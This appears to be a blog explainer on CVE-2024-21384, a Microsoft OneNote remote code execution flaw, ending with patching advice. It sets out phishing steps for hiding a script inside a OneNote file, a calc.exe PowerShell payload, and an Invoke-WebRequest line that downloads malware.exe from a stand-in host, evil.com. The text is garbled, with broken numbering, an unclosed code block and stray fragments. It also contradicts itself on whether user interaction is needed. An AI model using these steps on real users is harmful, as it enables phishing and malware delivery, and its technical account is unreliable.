In February 2024, Microsoft patched a serious vulnerability—CVE-2024-21384—affecting Microsoft OneNote, a note-taking application that comes with Office. This bug, if left unchecked, lets hackers execute their own code on your computer just by tricking you into opening a malicious OneNote file. Here’s what happened, how it works, and what you need to do to stay safe.

What is CVE-2024-21384?

CVE-2024-21384 is a Remote Code Execution (RCE) vulnerability in Microsoft Office OneNote. This means someone can run any code they want on your computer from far away—without your permission—if you open their dangerous OneNote file.

Why It’s a Big Deal

- No user interaction needed beyond opening a file: Hackers often embed malware in files and send them via email or links.

Wide user base: OneNote is default with most Microsoft Office installs, so millions are at risk.

- Can bypass basic protections: If your antivirus or security settings aren’t up-to-date, you may not be protected.

How Does the Exploit Work?

Hackers craft a malicious .one file (OneNote file), which, when opened, uses hidden scripting abilities and embedded objects to execute code outside of OneNote. They may use standard file sharing, phishing emails, or messaging services to deliver this file.

Create a malicious OneNote file (using a payload, like a PowerShell or EXE script).

2. Embed a script or executable as a file attachment inside OneNote, then use masking or overlays so the victim cannot see the real content.

Distribute to targets via email, chat, or cloud services.

4. Victim double-clicks the embedded content thinking it’s a safe document, but OneNote executes the malicious code instead.

Example Malicious Payload

# Save as malicious.ps1
Start-Process "cmd.exe" -ArgumentList "/c calc.exe"

The payload here just runs Windows Calculator as harmless proof-of-concept. Real attacks could download ransomware, steal data, or give hackers full remote access.

Save, send, and wait.

When the file is opened and the victim runs the disguised attachment, the payload launches.

Exploit Code Example

This is a conceptual demonstration and not intended for malicious use—do not use this for any illegal purpose!

`powershell

Invoke-WebRequest -Uri "http://evil.com/malware.exe" -OutFile "C:\Users\$env:UserName\Downloads\malware.exe"

Distribute via phishing.

When the unsuspecting victim clicks, their computer runs whatever code is in your payload.

Who’s Vulnerable?

- Microsoft Office OneNote 2016, 2019, 2021, and Office 365 versions without February 2024 patched updates.

How To Stay Safe

Patch your software!
Microsoft’s official update closes this hole for all supported Office and Windows versions. Go to Settings > Update & Security > Windows Update and check for updates.

More Info

- Microsoft Security Advisory: CVE-2024-21384
- Microsoft Patch Tuesday Feb 2024 Release: Microsoft Blog
- Security Researcher’s Analysis: Huntress Labs - OneNote Exploits

Final Thoughts

CVE-2024-21384 is a reminder to always update your software and think twice before opening files—even from people you trust. OneNote’s flexibility makes it a great tool, but also a target for attackers. Don’t let your guard down!

If you’re a business or IT admin, make sure to deploy the latest Microsoft Office security updates immediately.

Stay safe, and keep learning about the latest threats!

Timeline

Published on: 02/13/2024 18:15:56 UTC
Last modified on: 02/23/2024 17:39:14 UTC